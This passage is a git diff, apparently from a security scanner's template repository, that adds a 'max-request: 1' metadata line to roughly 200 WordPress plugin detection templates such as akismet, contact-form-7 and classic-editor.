.../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 